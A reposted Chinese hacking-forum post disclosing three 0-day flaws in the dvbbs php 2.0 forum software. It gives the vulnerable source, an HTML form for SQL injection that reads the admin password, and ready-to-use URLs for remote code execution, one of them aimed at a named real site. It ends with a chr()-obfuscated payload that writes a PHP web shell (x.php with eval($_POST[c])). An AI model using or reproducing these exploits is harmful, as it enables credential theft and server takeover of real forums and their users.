【转载】dvbbs php2.0 的几处 0day

作者：T00ls 核心成员 Xhm1n9
时间：2010.8.19

1：joinvipgroup.php  //注入
function up_vipuser(){
global $lang,$db,$dv,$userid,$userinfo,$vipgroupuser;
$groupid=$_POST['vipgroupid'];
$btype=$_POST['Btype'];
$vipmoney=$_POST['vipmoney'];
$vipticket=$_POST['vipticket'];
if($groupid==0 or $vipmoney<0 or $vipticket<0){echo "@@";
   showmsg($lang['join.info4']);
   exit;
}
$issql=$db->scalar("SELECT count(1) FROM {$dv}usergroups WHERE parentgid=5 and usergroupid='".intval($groupid)."'");echo $issql;
if($issql>0 AND ($sql=$db->query("SELECT usergroupid,title,usertitle,groupsetting,grouppic FROM {$dv}usergroups WHERE parentgid=5 and usergroupid='".intval($groupid)."'"))){
   while ($arr=$db->fetch_array($sql)){
    $vipgroupsetting=explode(",",$arr['groupsetting']);
    $upsetting=explode($lang['join.separator1'], $vipgroupsetting[71]);//'升级到该组所需金币数 金币数§点券数§有效天数§最低天数
    if($btype==1){echo "???";
     $vipmoney=0;
     if(intval($upsetting[3])>0){
      $mustnum=$upsetting[3]*$upsetting[1]/$upsetting[2];
      if($mustnum>0){
       $mustnum=number_format($mustnum,0);
      }else{
       showmsg($lang['join.info5']);
       exit;
      }
     }
     if($userinfo['userticket']<$vipticket or $vipticket<$mustnum){
      showmsg($lang['join.info6']);
      exit;
     }
     $updats=$vipticket*$upsetting[2]/$upsetting[1];
     $updats=intval(number_format($updats,0));
    }else{echo "&&&";
     $vipticket=0;
     if($upsetting[3]>0){
      $mustnum=$upsetting[3]*$upsetting[0]/$upsetting[2];
      if($mustnum>0){
       $mustnum=number_format($mustnum,0);
      }else{
       showmsg($lang['join.info5']);
       exit;
      }
     }
                                 var_dump($userinfo['usermoney']<$vipmoney);
                                   var_dump($vipmoney<$mustnum);
     if($userinfo['usermoney']<$vipmoney || $vipmoney<$mustnum){echo "ri";
      showmsg($lang['join.info7']);
      exit;
     }
     $updats=$vipmoney*$upsetting[2]/$upsetting[0];
     $updats=intval(number_format($updats,0));
    }
    if($vipgroupuser===true){echo "%%%";
     $db->query("UPDATE {$dv}user SET usergroupid=".$groupid.",userclass='".$arr['usertitle']."',titlepic='".$arr['grouppic']."',usermoney=usermoney-".$vipmoney.",userticket=userticket-".$vipticket.",vip_endtime='".($userinfo['vip_endtime']+$updates*24*3600)."' WHERE userid=".$userid."");
     $db->query("UPDATE {$dv}online SET usergroupid='$groupid' Where userid=$userid");
    }else{echo "^^^";
     $db->query("UPDATE {$dv}user SET usergroupid=".$groupid.",userclass='".$arr['usertitle']."',titlepic='".$arr['grouppic']."',usermoney=usermoney-".$vipmoney.",userticket=userticket-".$vipticket.",vip_endtime='".(TIME_NOW+$updates*24*3600)."',vip_startime='".TIME_NOW."' WHERE userid=".$userid."");
     $db->query("UPDATE {$dv}online SET usergroupid='$groupid' Where userid=$userid");
    }
   ..............................................................
   $vipmoney变量没有过滤，利用前提是管理员设了vip会员组,有点金币:)

<title>test</title><form name="p_form" id="p_form" method="post" action="http://127.1/dvbbs/joinvipgroup.php?action=upvipuser" enctype="multipart/form-data">
<input id='img_thumb_final' name='vipmoney' type="text" value="0,useremail=123456">
<input id='img_thumb_final' name='vipticket' type="text" value="88">
<input id='img_thumb_final' name='vipgroupid' type="text" value="25">
<input id='img_thumb_final' name='Btype' type="text" value="">
<input name="sub" type="submit" value="提交" />
</form>

<!------------
0,userface=(select password from dv_admin where id=1) where userid=1#
!>
  

2：cache/static/index_0_0.php //执行漏洞
index.php
if((!$useindexstatic) || (!$useindexstatic_css) || $page>1 || $topicmode>0){
   ....................................
if($useindexstatic_css && $page < 2 && $topicmode==0){
   $this_my_f= ob_get_contents(); //生成缓存文件
   ob_end_clean();
   to_static_php_file($indexstatic,$this_my_f);
}
   ...................................
}

写缓存生成的文件里有eval(),但文件顶部没有限制返问
<? eval("\$lang['tpl.str10']=\"{$lang['tpl.str10']}\";");?>

index_0_0.php?lang[tpl.str10]={${phpinfo()}}

3：templates/default/index.tpl.php //执行漏洞
<?
if( !defined('ISDVBBS') ){
header('HTTP/1.0 404 Not Found');
exit;
}
global $imgurl;
if($useindexstatic)
   echo '<? eval("\$lang[\'tpl.str10\']=\"{$lang[\'tpl.str10\']}\";");?>';
else
   eval("\$lang['tpl.str10']=\"{$lang['tpl.str10']}\";");
?>
.........................
index.php
   ...........//省略部份代码
if((!$useindexstatic) || (!$useindexstatic_css) || $page>1 || $topicmode>0){
if($useindexstatic_css &&$page < 2 && $topicmode==0){
   $useindexstatic= true;
   ob_start();
}
else
   $useindexstatic= false;
include_once INC_PATH.'DV_Encoding.class.php';
$objenc =& DV_Encoding::GetEncoding($charset);
$lang = load_lang($lang, 'index' );
....................
      
首页调用模板，但没初始化$lang变量
只要满足if($useindexstatic_css &&$page < 2 && $topicmode==0)条件就能成功

例子:
   http://www.flyingcity.cn/bbs/index.php?lang[tpl.str10]={${phpinfo()}}
   index.php?lang[tpl.str10]={${phpinfo()}}
   index.php?lang[tpl.str10]={${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(120).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(43).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(32).chr(62).chr(39).chr(41).chr(59))}}      fputs(fopen('x.php','w+'),'<?eval($_POST[c])?>');